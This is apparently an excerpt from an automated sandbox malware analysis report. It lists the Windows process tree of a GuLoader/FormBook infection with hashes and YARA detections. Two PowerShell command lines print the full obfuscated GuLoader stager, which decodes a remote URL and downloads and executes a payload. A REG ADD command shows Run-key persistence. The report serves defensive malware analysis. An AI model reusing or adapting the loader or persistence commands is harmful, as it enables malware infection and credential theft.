                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:4
                          Start time:09:51:31
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:09:51:32
                          Start date:04/05/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\cmd.exe /c dir
                          Imagebase:0x7ff7d21a0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:09:51:32
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:09:51:33
                          Start date:04/05/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden +Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:8
                          Start time:09:51:33
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:09:51:37
                          Start date:04/05/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
                          Imagebase:0x7ff7d21a0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:09:51:44
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.bal L.vn:Sta iFThyreroplbeeSherieRefinlValgbaRetinnbevi,cvar.ee SaagrN ninsC.ook= SurfNLkkereTribuwSk am-Tire OUnprobEidesjBitumeStyrmckor otSurm. HjagtSBle.iy SupesUnsu.tTilkeeMak rmPlta.. LmmeNTela,e UnvetPrvel. VegeWmeniseKiwieb ReupC AntilUnsa.iSpe ieVint nTeglvta alo ');biblioteksfilerne (Tyknende '.nfan$ DeusFFam,lr TiggeThodueIndsalLeakia Helln.ortvc udvaeH nstrVolumsMe.le.,ekonHO.stdeRedera VinedDiftoeBasrerSeculsGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntegeForvar bekms Gr,p.Adju D no coInsu.wEtabln B.valAn icoOrenjaStj.rdBegreFGrundiP,efalU,vuleKrigs( Hydr$ba,reDFoldaiTorpeeGauffnRefle,Robin$GematoMalesvExtrae omarstramdVagtmrMatt,ythion)Hagta ';$Naturtr=$Titar[1]+$Naturtr;$overdry=$Titar[0];biblioteksfilerne (Tyknende 'Respi$Unling ,haklSanitoImmunbKoereaCortel Wise:.hmsmESta.ls TanztAd.omhF imreSommesGiganiDkfaboBitism,chelemi,rot Fr,srHomelyPos e1Unruf7Ne,to6 Anti=Alter(UncliTF,agmeBordesTzaritMarse-CoccoPPolyea Catat BesthAfliv Arbej$FestioMyriavIsraeeWal,arPaatrdCountr roreyPaasy)Sivap ');while (!$Esthesiometry176) {biblioteksfilerne (Tyknende 'S vsk$,nequgSkindlDummeoSyst bMote.aStereladmir:Maro L MaraeStrghvProp ePhot.mHoneya DryanB,rkndNeg.rsOve v= s.id$C asstUn eurPreinu SkraeI,gtt ') ;biblioteksfilerne $Naturtr;biblioteksfilerne (Tyknende 'FradrS,rakvtDentnaAbdicrRec mt,dult-BashfSSaltblSaddeeRukaneTen.epHerop Srgem4Bakov ');biblioteksfilerne (Tyknende 'pulve$Extrag TolllRubasoEsotebUenigaafgrel.alad: HvsnEPustesB,mbltSidsthEspoueServisunnaki FdevoGuldsmExpuneTravet EmnerSov kyPo.tl1De.el7 Co r6Ha ay= O.pl(I,venT Svi,eForplsFds etVinte-Ke,tsPper,daPerittRhodehSjatt Firaa$ForsyoUnhusvRe,ece Ant,rH.mogdDese r Wo,syInter)A,fri ') ;biblioteksfilerne (Tyknende 'Reg,s$Kemikg Duv.lHeno,oUnideb Ho.kaMa telNonev: popSAp oceBrassp DiaktbarkeiBeskrs.rnseyClinil SkatlHyperaCharmb ChrolDy.ehesi if=Strej$ cla,gDemesl D buoBedlabNarkoaBardulViles:Arb.jC Lagra F.agtU.hunt.enselRingleChan.gSvrdla,aveetC,cobeTelen1Aden +Penan+Nause%Ridde$Vak.eFOkariaSt ute OverrFestsdRetspiMiljagSpads. Therc Fi eoPerjuuStikknFrem.tEnsn ') ;$Dien=$Faerdig[$Septisyllable];}biblioteksfilerne (Tyknende 'Multi$UnsuigMicrolStumpoL icibRevleaBogydlCont :PotomFned.roBedu,s PowesBat hePre,crKybel gasbl= Trai estheGAnimee eizit kemi- NonjCB,ldioRet hnGaasetara,ieRrelsnTjlestExcub Sator$KonduoLitt.vBepapeH,emmrIntemdSeniarAfkray Male ');biblioteksfilerne (Tyknende 'Nonde$ByretgBrugslEvacuoTjenebDadelaOpk elUdsen: A chP For.otranssT rteiDkstitLovgiiUds ro ,rilnSlidssFri,tao,erdnG,dfrgJaskei AcnevInconebyltelMattbsR,vene esmo .aret=,orsk Acaro[VestaS Un.ryHe.tasSa met.renieEvalum,ontr. .echCHarbro Mun nAsc.ivTopngeBolsjr Ko mtEpico]React:Mange: DecaFGamogr Ud.eomik om ermiBd.sseaTornesSpendeSe.su6 Jock4nonniSSny etTreetrMerc iProren nfeagPlica(Surpl$tidehFCodoro ellsHvirvsFlutee De,irUndow)Count ');biblioteksfilerne (Tyknende 'Synsp$Siccig Ca dlTa,sto.rolebNogleaRenholStagn:B rfoDNordbeScrimlKro.seTropog KisteSilverBoghve Afbrt Sel mRembudB.dgeeunglor Puka ,rvle=Moder Marqu[to,roSPartiy KaolsSnibbtNonioe ,nibmUnbef.Af lrTGgegeeHushaxBord,tNonv,. ubsaESforzn Illuc posio SkuldCo upiYppetnSabbigNorde]Norda:,unkt:CustoA yveSEfterCFortsIS entIAnusi.Ska,tGPeccaeVeiletTovtrSTin ltBrummr DialiN,nrenslvfegSten,(Vrdia$ V deP T,rooAcyansOateriTramwt PoleiSixpeoBevirn FestsA.eolaUndebnNonprg plebiCog.ov,rovie S.mil.oglesMentaeHello)Ratif ');biblioteksfilerne (Tyknende 'Junni$ForhagGieselJoyproMedlbb Ultia Umynl emin:AaremBFernaiVernansljferty,edePneums sinu=Knogl$ForpaDSphegeTra ilvers.eVrikdgNord,e Frosr OdoneZombitS,rtemStipud trope Rejnr ,eli.AriadsTypoguV.ntubCephasResidt yprer ProfiNonnenHoe.lgKonfe(Ceilo2Bgesp8Advi 4 Anra0Contr2 Uove1Admin, S dd2 Opsl8Drfta4 B,ho7 Medi1Biolu)Novit ');biblioteksfilerne $Binres;"
                          Imagebase:0x530000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2231302976.000000000AFC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:09:51:45
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:09:52:04
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                          Imagebase:0xf80000
                          File size:516'608 bytes
                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:true

                          General

                          Target ID:16
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
                          Imagebase:0x240000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:17
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:18
                          Start time:09:52:11
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
                          Imagebase:0xd0000
                          File size:59'392 bytes
                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:19
                          Start time:09:52:32
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
                          Imagebase:0x4b0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Has exited:false

                          General

                          Target ID:20
                          Start time:09:52:38
                          Start date:04/05/2024
                          Path:C:\Windows\SysWOW64\clip.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                          Imagebase:0xf70000
                          File size:24'576 bytes
                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Has exited:false

                          General

                          Target ID:22
                          Start time:09:52:53
                          Start date:04/05/2024
                          Path:C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe"
                          Imagebase:0x4b0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
